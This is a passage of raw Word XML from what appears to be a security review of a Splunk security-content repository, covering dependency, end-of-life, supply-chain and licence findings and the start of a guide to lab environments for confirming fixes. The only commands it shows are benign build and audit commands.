            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Third-party reputation-service URL with alliance key parameters in SOAR playbook sample values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Open-Source, Third-Party, End-of-Life and Licensing Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A full software composition analysis was performed on the build toolchain, the GitHub Actions, the Splunk platform and add-ons, the SOAR connector requirements, the pre-commit tooling and the third-party data embedded in the repository. Component versions, end-of-life dates and licences were verified online against PyPI, the OSV advisory database, endoflife.date, Docker Hub, Splunkbase and the Go module proxy on the review date; items that could only be reasoned from training knowledge are identified as such in the detailed findings DEP-01 through DEP-12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Vulnerable and unlocked components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The build tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version 1.1.1 is the only pinned Python requirement. It pulls 18 direct dependencies with lower-bound-only constraints, resolving to 65 packages with no lockfile and no hashes. The resolution obtained on the review date is clean: a strict audit reported zero known vulnerabilities across the 65 packages. The same requirement set resolved at its minimum permitted versions carries 37 published advisories, including 25 in an old GitPython and one each in old </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pydantic-settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> releases. The exposure is therefore structural, the resolver is free to select a vulnerable or malicious future release, rather than a present vulnerability. Several workflows additionally install packages with no version constraint at all, and one of those jobs holds long-lived cloud credentials (finding DEP-02, the single High in this area).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 End-of-life components</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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069"/>
        <w:gridCol w:w="2328"/>
        <w:gridCol w:w="3311"/>
        <w:gridCol w:w="932"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Version in repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Status on review date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk Enterprise test container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>splunk/splunk:9.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.3 reached end of life 2026-07-24; current line is 10.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI Python runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>reached end of life 2026-10-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk add-ons installed for testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>38 pinned tarballs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10 are a full major version behind Splunkbase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbook exports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>schema 4 and 5.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>exported from unsupported SOAR builds back to 4.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04, DEP-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DSDL notebook stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2328" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>torch 1.11, numpy 1.19, Python 3.8 to 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>torch 1.11 carries 30 advisories including a load-time code-execution issue; content is deprecated and not shipped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-11, DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No component that ships to ESCU customers in the built app is itself end-of-life; the exposure is in the test and build environment and in deprecated content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Supply-chain integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Every third-party GitHub Action is referenced by a mutable major tag rather than a commit digest, two of them in credential-handling positions; a Go tool is installed at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@latest</w:t>
      </w:r>
      <w:r>
        <w:t>; dozens of app tarballs and two container images are fetched by mutable name with no checksum; and the test-data cache tracks a moving branch. None of these verifies the bytes it executes. Findings DEP-03 and DEP-05 give the exact pinning remediation with verified commit digests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Licence compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The repository is Apache-2.0. Two embedded lookup datasets are derived from GPL-3.0 upstream projects and are redistributed with no notice or attribution, which is incompatible with Apache-2.0 one-way compatibility; several Apache-2.0 and MITRE-licensed datasets are redistributed without the attribution those licences require; there is no NOTICE file anywhere in the tree; no Python file carries a licence header; and the core build dependency publishes no licence metadata from a non-public source repository. One large lookup has no stated provenance at all. No copyleft code ships to customers in the built app, the two GPL tools in the dependency tree are build-time only. Finding DEP-06 provides the NOTICE text, per-lookup provenance fields and the three options for resolving the GPL-derived data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Software bill of materials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A complete component inventory, with each package version, source, licence, latest known version, end-of-life status and known vulnerabilities, is maintained in the dependency finding set (DEP-01 lists the full 65-package table). The recommendation is to generate a hash-locked requirements file, add the pip and container ecosystems to automated dependency updates, and publish a CycloneDX software bill of materials with every release (finding DEP-12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Verification Guide: Where to Test and How to Confirm the Fixes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No live system was available to this review, so each proof of concept was executed against the extracted code in an isolated sandbox (details are inside each finding). This section tells you which disposable systems you need to reproduce the finding classes and, more importantly, how to confirm that a remediation works. Use only non-production systems that you own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Test environments</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server to test on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>How to obtain it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dashboard token handling (APP-01, APP-02, APP-12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A disposable Splunk Enterprise 10.x instance with the built ESCU app installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>contentctl-ng build</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the repo, start </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>splunk/splunk:10.0.11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> in Docker with the web port published, install </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>dist/DA-ESS-ContentUpdate.tar.gz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> through Apps, Manage Apps, Install app from file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbook input handling and approval gates (PB1-*, PB2-*, CF-*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A Splunk SOAR 6.4 lab instance (Community Edition OVA or trial) with connectors pointed at lab targets only: a throw-away Windows VM with WinRM, a Linux VM with SSH, a lab AD or cloud tenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Import each playbook from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, configure assets to the lab targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI expression handling (CI-01, CI-02)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A private fork of the repository that you own, with Actions enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fork, keep workflows unchanged, open pull requests from a second account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Supply-chain and licence findings (DEP-*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Any workstation with Python 3.14 and PyPI access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>uv venv --python 3.14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>uv pip install contentctl-ng==1.1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>pip-audit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>pip-licenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets findings (SEC-*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The repository checkout itself</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>gitleaks detect --source . --no-git</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
